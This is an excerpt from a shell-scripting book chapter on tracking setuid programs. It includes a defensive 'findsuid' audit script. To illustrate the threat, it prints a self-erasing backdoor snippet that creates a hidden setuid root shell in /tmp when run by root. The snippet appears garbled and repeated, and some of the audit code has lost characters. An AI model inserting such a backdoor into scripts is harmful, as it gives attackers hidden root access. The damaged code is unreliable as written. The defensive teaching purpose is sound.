Chapter 6: System Administration: System Maintenance


The most common use of shell scripts is to help with Unix or Linux system administration. There's an obvious reason for this, of course: Administrators are often the most knowledgeable Unix users on the system, and they also are responsible for ensuring that things run smoothly and without a glitch. But there might be an additional reason for the emphasis on shell scripts within the system administration world. My theory? That system administrators and other power users are the people most likely to be having fun with their system, and shell scripts are quite fun to develop within the Unix environment!

And with that, let's continue exploring how shell scripts can help you with system administration tasks .

#49 Tracking Set User ID Applications

There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.

In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is invoked by the unsuspecting root user:

 if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME   cp /bin/sh /tmp/.rootshell               # REMOVEME   chown root /tmp/.rootshell               # REMOVEME   chmod -f 4777 /tmp/.rootshell            # REMOVEME   grep -v "# REMOVEME" 
 if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME cp /bin/sh /tmp/.rootshell # REMOVEME chown root /tmp/.rootshell # REMOVEME chmod -f 4777 /tmp/.rootshell # REMOVEME grep -v "# REMOVEME" $0 > /tmp/junk # REMOVEME mv /tmp/junk $0 # REMOVEME fi # REMOVEME 
> /tmp/junk # REMOVEME mv /tmp/junk
 if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME cp /bin/sh /tmp/.rootshell # REMOVEME chown root /tmp/.rootshell # REMOVEME chmod -f 4777 /tmp/.rootshell # REMOVEME grep -v "# REMOVEME" $0 > /tmp/junk # REMOVEME mv /tmp/junk $0 # REMOVEME fi # REMOVEME 
# REMOVEME fi # REMOVEME

Once this script is run by root , a shell is surreptitiously copied into /tmp as .rootshell and is made setuid root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code (hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.

The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of root ; hence the critical need to ensure that you know and approve of all setuid root commands on your system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason, but it's still smart to keep an eye on things.

The Code

 #!/bin/sh # findsuid - Checks all SUID files or programs to see if they're writeable, # and outputs the matches in a friendly and useful format. mtime="7"       # how far back (in days) to check for modified cmds verbose=0       # by default, let's be quiet about things if [ "" = "-v" ] ; then   verbose=1 fi for match in $(find / -type f -perm +4000 -print) do   if [ -x $match ] ; then     owner="$(ls -ld $match  awk '{print }')"     perms="$(ls -ld $match  cut -c5-10  grep 'w')"     if [ ! -z $perms ] ; then       echo "**** $match (writeable and setuid $owner)"     elif [ ! -z $(find $match -mtime -$mtime -print) ] ; then       echo "**** $match (modified within $mtime days and setuid $owner)"     elif [ $verbose -eq 1 ] ; then       lastmod="$(ls -ld $match  awk '{print , , }')"       echo "     $match (setuid $owner, last modified $lastmod)"     fi   fi done exit 0 

How It Works

This script checks all setuid commands on the system to see if they're group -or world-writable and whether they've been modified in the last $mtime days.

Running the Script

This script has one optional argument: -v produces a verbose output that lists every setuid program encountered by the script. This script should probably be run as root , but it can be run as any user that has access permission to the key directories.

The Results

I've dropped a "hacked" script somewhere in the system. Let's see if findsuid can find it:

 $  findsuid  **** /var/tmp/.sneaky/editme (writeable and setuid root) 

There it is!

 $  ls -l /var/tmp/.sneaky/editme  -rwsrwxrwx  1 root  wheel  25988 Jul 13 11:50 /var/tmp/.sneaky/editme 

A huge hole just waiting for someone to exploit.




Wicked Cool Shell Scripts. 101 Scripts for Linux, Mac OS X, and Unix Systems
Wicked Cool Shell Scripts
ISBN: 1593270127
EAN: 2147483647
Year: 2004
Pages: 150
Authors: Dave Taylor

Similar book on Amazon

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net